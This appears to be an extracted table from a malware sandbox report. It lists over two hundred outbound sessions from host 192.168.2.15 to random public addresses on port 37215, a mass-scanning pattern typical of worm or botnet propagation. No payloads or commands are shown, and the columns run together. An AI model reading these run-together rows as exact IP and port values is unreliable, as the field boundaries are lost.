                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26908192.168.2.156018452.216.4.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26909192.168.2.1555352181.215.57.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26910192.168.2.1545296157.207.121.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26911192.168.2.1556178138.154.42.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26912192.168.2.1548248156.89.84.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26913192.168.2.155564237.114.139.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26914192.168.2.154814287.47.89.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26915192.168.2.1557752156.81.232.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26916192.168.2.153918041.150.3.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26917192.168.2.1553658197.40.103.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26918192.168.2.1553494190.169.9.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26919192.168.2.1554784122.89.200.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26920192.168.2.1549950186.182.71.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26921192.168.2.153904445.154.102.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26922192.168.2.1554524121.27.131.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26923192.168.2.1560000122.108.92.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26924192.168.2.153907841.41.99.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26925192.168.2.1551300197.122.83.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26926192.168.2.1542738122.76.100.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26927192.168.2.153433294.250.237.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26928192.168.2.1554436197.123.242.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26929192.168.2.155583637.19.20.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26930192.168.2.1551488121.103.216.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26931192.168.2.1543926181.90.71.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26932192.168.2.1533902222.169.30.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26933192.168.2.156058231.132.132.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26934192.168.2.153352294.62.177.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26935192.168.2.1547028222.127.62.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26936192.168.2.155661441.33.58.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26937192.168.2.1543076102.209.147.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26938192.168.2.1542380181.232.247.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26939192.168.2.1538070222.203.192.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26940192.168.2.1553950190.28.121.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26941192.168.2.1537186186.181.255.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26942192.168.2.153472045.209.175.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26943192.168.2.154397445.49.7.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26944192.168.2.155839645.208.59.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26945192.168.2.1536578156.175.240.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26946192.168.2.1534390186.227.152.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26947192.168.2.1548210156.161.49.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26948192.168.2.1539058190.140.197.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26949192.168.2.1557928119.247.248.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26950192.168.2.1536472222.139.251.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26951192.168.2.155941631.113.17.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26952192.168.2.1546970156.66.114.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26953192.168.2.1547610190.92.221.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26954192.168.2.153364041.82.243.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26955192.168.2.154284631.224.101.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26956192.168.2.1541120170.28.15.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26957192.168.2.1545706122.29.230.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26958192.168.2.156037494.136.249.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26959192.168.2.155831037.148.76.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26960192.168.2.1540180121.212.213.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26961192.168.2.1539954156.40.251.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26962192.168.2.1538046186.183.95.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26963192.168.2.153439237.97.144.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26964192.168.2.1543382181.66.236.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26965192.168.2.1553714181.155.196.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26966192.168.2.1557582222.249.137.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26967192.168.2.1554294102.77.41.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26968192.168.2.1540742197.103.220.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26969192.168.2.1535124156.96.153.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26970192.168.2.1541970222.80.1.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26971192.168.2.1533018157.227.33.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26972192.168.2.1537542186.99.192.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26973192.168.2.1539706102.211.158.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26974192.168.2.1555548156.108.77.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26975192.168.2.1559050190.5.178.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26976192.168.2.1539986197.115.234.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26977192.168.2.1538286197.143.159.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26978192.168.2.1546108138.110.41.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26979192.168.2.1543912186.109.29.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26980192.168.2.1534224102.147.22.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26981192.168.2.154265094.183.121.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26982192.168.2.1554250197.134.203.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26983192.168.2.1554636190.222.248.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26984192.168.2.1541012157.153.223.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26985192.168.2.1552568197.122.22.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26986192.168.2.1554212186.43.196.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26987192.168.2.154043837.177.183.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26988192.168.2.1534820136.45.46.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26989192.168.2.153614645.145.24.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26990192.168.2.1540000181.195.253.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26991192.168.2.154984237.146.67.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26992192.168.2.1540540186.237.75.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26993192.168.2.1534360102.72.228.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26994192.168.2.155698037.60.187.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26995192.168.2.154727241.203.174.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26996192.168.2.153577294.236.232.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26997192.168.2.1559458186.138.74.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26998192.168.2.1537830157.43.21.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26999192.168.2.1552064190.121.77.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27000192.168.2.1552576186.50.212.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27001192.168.2.1533732186.168.103.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27002192.168.2.1549046190.247.160.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27003192.168.2.1546182157.102.142.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27004192.168.2.1550226190.243.195.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27005192.168.2.1554690157.232.216.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27006192.168.2.154926245.220.161.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27007192.168.2.153950694.140.102.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27008192.168.2.1552178157.183.231.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27009192.168.2.154107831.133.136.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27010192.168.2.155039294.182.189.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27011192.168.2.154771837.236.125.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27012192.168.2.155532437.151.246.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27013192.168.2.1534914110.250.49.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27014192.168.2.1549830121.102.246.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27015192.168.2.1536694138.53.54.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27016192.168.2.154485627.37.49.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27017192.168.2.155948831.82.245.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27018192.168.2.1547358122.195.139.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27019192.168.2.153569094.244.69.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27020192.168.2.1551038157.108.237.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27021192.168.2.155819631.2.195.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27022192.168.2.15487189.67.98.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27023192.168.2.1537574157.233.168.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27024192.168.2.1536848190.173.50.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27025192.168.2.1533106222.170.227.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27026192.168.2.155456237.54.33.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27027192.168.2.1558446121.70.90.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27028192.168.2.1534920181.187.178.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27029192.168.2.1549396100.209.53.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27030192.168.2.153537845.153.146.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27031192.168.2.1558344181.101.38.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27032192.168.2.1551934121.115.236.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27033192.168.2.153813441.14.73.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27034192.168.2.154463645.186.243.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27035192.168.2.1539734181.199.83.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27036192.168.2.1556936122.202.96.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27037192.168.2.1555806156.92.79.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27038192.168.2.1550274122.187.179.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27039192.168.2.155046237.34.89.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27040192.168.2.1545508122.64.113.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27041192.168.2.155080231.240.95.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27042192.168.2.1558094121.242.241.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27043192.168.2.1551302197.154.122.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27044192.168.2.1539332190.255.223.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27045192.168.2.1557622190.221.249.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27046192.168.2.1536580157.211.67.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27047192.168.2.1554950121.237.162.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27048192.168.2.155130641.134.180.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27049192.168.2.1536624133.123.250.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27050192.168.2.1538834156.212.1.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27051192.168.2.156057445.234.169.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27052192.168.2.1537266102.232.103.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27053192.168.2.155981837.94.129.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27054192.168.2.155310841.158.104.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27055192.168.2.1544360156.36.145.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27056192.168.2.1541728121.146.204.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27057192.168.2.154580031.54.24.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27058192.168.2.15519009.166.58.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27059192.168.2.155453437.185.64.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27060192.168.2.1557452122.153.222.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27061192.168.2.1556180156.41.74.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27062192.168.2.1550740181.169.100.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27063192.168.2.1536648121.220.19.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27064192.168.2.1548142122.218.15.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27065192.168.2.153908237.174.92.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27066192.168.2.1536128138.170.14.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27067192.168.2.1540992197.176.139.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27068192.168.2.1554702121.32.27.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27069192.168.2.1545030122.56.79.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27070192.168.2.153752831.199.166.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27071192.168.2.1557442186.92.164.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27072192.168.2.154429037.146.47.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27073192.168.2.1555542157.180.156.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27074192.168.2.1541758181.111.195.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27075192.168.2.1538520181.59.106.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27076192.168.2.1537410157.224.129.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27077192.168.2.1541014121.175.34.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27078192.168.2.153641094.32.141.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27079192.168.2.1559658197.96.145.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27080192.168.2.1534074122.51.159.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27081192.168.2.1550526157.162.46.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27082192.168.2.153804831.161.180.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27083192.168.2.1546308222.98.191.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27084192.168.2.1541812190.118.92.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27085192.168.2.1534464186.246.89.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27086192.168.2.1538560157.206.40.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27087192.168.2.154796045.99.195.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27088192.168.2.1538902102.188.0.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27089192.168.2.1547858197.67.208.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27090192.168.2.1541418121.210.214.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27091192.168.2.154759041.19.31.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27092192.168.2.1536274197.55.192.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27093192.168.2.1557564121.16.16.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27094192.168.2.1545282121.213.116.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27095192.168.2.1549768222.121.51.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27096192.168.2.154100845.84.246.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27097192.168.2.1546304222.86.45.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27098192.168.2.1539082121.5.34.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27099192.168.2.155930431.80.193.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27100192.168.2.1553402181.148.151.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27101192.168.2.1556956121.237.15.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27102192.168.2.1555764190.193.63.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27103192.168.2.155119231.157.238.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27104192.168.2.1533450156.196.209.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27105192.168.2.1552310222.34.133.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27106192.168.2.1548160138.22.214.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27107192.168.2.1557306122.94.18.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27108192.168.2.1541086186.212.27.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27109192.168.2.1560646138.106.66.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27110192.168.2.1551894157.114.173.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27111192.168.2.1547224138.82.247.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27112192.168.2.154437837.223.104.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27113192.168.2.1535464157.209.199.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27114192.168.2.155139045.35.58.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27115192.168.2.1550712222.147.9.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27116192.168.2.155892694.31.108.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27117192.168.2.155793437.145.24.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27118192.168.2.1556972222.35.121.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27119192.168.2.1553702181.245.93.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27120192.168.2.154010845.148.214.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27121192.168.2.1558568197.119.223.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27122192.168.2.154574294.51.148.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27123192.168.2.1540122181.181.89.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27124192.168.2.1547562186.143.149.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27125192.168.2.1543036157.18.135.2437215
                                              TimestampBytes transferredDirectionData


